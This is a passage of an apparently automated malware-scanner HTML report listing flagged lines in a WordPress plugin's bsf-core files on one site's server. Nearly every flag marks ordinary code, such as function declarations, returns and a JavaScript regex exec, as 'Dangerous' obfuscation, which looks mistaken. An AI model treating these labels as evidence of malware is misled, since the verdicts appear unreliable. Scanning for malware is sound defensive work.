<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$all_products</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_extension_nag' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 153</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_extension_nag</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mu_updater </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$bsf_api_site</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 239</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_nag_brainstorm_updater_multisite' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_nag_brainstorm_updater_multisite</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'is_plugin_active_for_network' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 24</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_api_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefer_unsecure </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 30</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_time_since_last_versioncheck</span><span style="color: #007700">( </span><span style="color: #0000BB">$hours_completed</span><span style="color: #007700">, </span><span style="color: #0000BB">$option </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions </span><span style="color: #007700">for </span><span style="color: #0000BB">BSF Core</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$status</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 55</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_convert_core_path_to_relative' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">String URL of bsf</span><span style="color: #007700">-</span><span style="color: #0000BB">core directory</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 63</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_convert_core_path_to_relative</span><span style="color: #007700">( </span><span style="color: #0000BB">$path </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function( </span><span style="color: #0000BB">__FUNCTION__</span><span style="color: #007700">, </span><span style="color: #DD0000">'1.22.46'</span><span style="color: #007700">, </span><span style="color: #DD0000">'bsf_core_url' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bsf_core_url</span><span style="color: #007700">( </span><span style="color: #DD0000">'' </span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 70</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_core_url' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 72</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_core_url</span><span style="color: #007700">( </span><span style="color: #0000BB">$append </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 78</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">( </span><span style="color: #0000BB">get_template_directory_uri</span><span style="color: #007700">() . </span><span style="color: #DD0000">'/admin/bsf-core/'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/' </span><span style="color: #007700">) . </span><span style="color: #0000BB">$append</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">( </span><span style="color: #0000BB">plugin_dir_url</span><span style="color: #007700">( </span><span style="color: #0000BB">BSF_UPDATER_FILE </span><span style="color: #007700">), </span><span style="color: #DD0000">'/' </span><span style="color: #007700">) . </span><span style="color: #0000BB">$append</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 85</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_brainstorm_product' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 91</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_brainstorm_product</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_get_api_site</span><span style="color: #007700">( </span><span style="color: #0000BB">$prefer_unsecure </span><span style="color: #007700">= </span><span style="color: #0000BB">false </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_359").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/plugin-installer/admin-functions.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.54 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 17</span><br><table id="file_360" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$response</span><span style="color: #007700">; } } if ( ! </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_install_callback' </span><span style="color: #007700">) ) { function </span><span style="color: #0000BB">bsf_install_callback</span><span style="color: #007700">() { </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">= </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'product_id'</span><span style="color: #007700">] ); </span><span style="color: #0000BB">$bundled </span><span style="color: #007700">= </span><span style="color: #0000BB">esc_attr</span><span style="color: #007700">( </span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'bundled'</span><span style="color: #007700">] ); </span><span style="color: #0000BB">$response </span><span style="color: #007700">= </span><span style="color: #0000BB">install_bsf_product</span><span style="color: #007700">( </span><span style="color: #0000BB">$product_id </span><span style="color: #007700">); </span><span style="color: #0000BB">$redirect_url </span><span style="color: #007700">= </span><span style="color: #0000BB">ap</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 146</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'install_bsf_product' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">install_bsf_product</span><span style="color: #007700">( </span><span style="color: #0000BB">$install_id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$id</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$Plugin_Upgrader</span><span style="color: #007700">-></span><span style="color: #0000BB">result</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$response</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 275</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'bsf_install_callback' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">bsf_install_callback</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 27</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'check_bsf_product_status' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_bsf_product_status</span><span style="color: #007700">( </span><span style="color: #0000BB">$id </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_bsf_product_id' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 46</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$status</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bsf_product_id</span><span style="color: #007700">( </span><span style="color: #0000BB">$template </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">( </span><span style="color: #DD0000">'get_bundled_plugins' </span><span style="color: #007700">) ) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_bundled_plugins</span><span style="color: #007700">( </span><span style="color: #0000BB">$template </span><span style="color: #007700">= </span><span style="color: #DD0000">'' </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_360").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/admin/bsf-core/plugin-installer/index.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 16.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 7</span><br><table id="file_361" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){ </span><span style="color: #0000BB">window</span><span style="color: #007700">.</span><span style="color: #0000BB">location </span><span style="color: #007700">= </span><span style="color: #0000BB">$link</span><span style="color: #007700">; },</span><span style="color: #0000BB">2000</span><span style="color: #007700">); } else { </span><span style="color: #0000BB">$ext</span><span style="color: #007700">.</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.bsf-extension-start-install'</span><span style="color: #007700">).</span><span style="color: #0000BB">find</span><span style="color: #007700">(</span><span style="color: #DD0000">'.bsf-extension-start-install-content'</span><span style="color: #007700">).</span><span style="color: #0000BB">html</span><span style="color: #007700">(</span><span style="color: #DD0000">'<h3>Something went wrong! Contact plugin author.</h3>'</span><span style="color: #007700">); } } }); }); }); })(</span><span style="color: #0000BB">jQuery</span><span style="color: #007700">); </</span><span style="color: #0000BB">script</span><span style="color: #007700">> <?</span><span style="color: #0000BB">php </span><span style="color: #007700">endif; </span><span style="color: #0000BB">?></span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 353</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function($){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 354</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 355</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 357</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 393</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">response</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 410</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">i</span><span style="color: #007700">,</span><span style="color: #0000BB">res</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Function exec <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 397</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">exec</span><span style="color: #007700">(</span><span style="color: #0000BB">response</span><span style="color: #007700">);<br /><br /> if ( </span><span style="color: #0000BB">typeof matches</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">] != </span><span style="color: #DD0000">"undefined" </span><span style="color: #007700">) {<br /> var </span><span style="color: #0000BB">responseObj </span><span style="color: #007700">= </span><span style="color: #0000BB">jQuery</span><span style="color: #007700">.</span><span style="color: #0000BB">parseJSON</span><span style="color: #007700">( </span><span style="color: #0000BB">matches</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">] );<br /><br /> if ( </span><span style="color: #0000BB">responseObj</span><span style="color: #007700">.</span><span style="color: #0000BB">redirect </span><span style="color: #007700">!= </span><span style="color: #DD0000">"" </span><span style="color: #007700">) {<br /> </span><span style="color: #0000BB">window</span><span style="color: #007700">.</span><span style="color: #0000BB">location </span><span style="color: #007700">= </span><span style="color: #0000BB">responseObj</span><span style="color: #007700">.</span><span style="color: #0000BB">redirect</span><span style="color: #007700">;<br /> }<br /> }<br /><br /> var </span><span style="color: #0000BB">blank_response </span><span style="color: #007700">= </span><span style="color: #0000BB">true</span><span style="color: #007700">;<br /> var </span><span style="color: #0000BB">plugin_status </span><span style="color: #007700">= </span><span style="color: #0000BB">response</span><span style="color: #007700">.</span><span style="color: #0000BB">split</span><span style="color: #007700">(</span><span style="color: #DD0000">'|'</span><span style="color: #007700">);<br /> var </span><span style="color: #0000BB">is_ftp </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">;<br /> $.</span><span style="color: #0000BB">each</span><span style="color: #007700">(</span><span style="color: 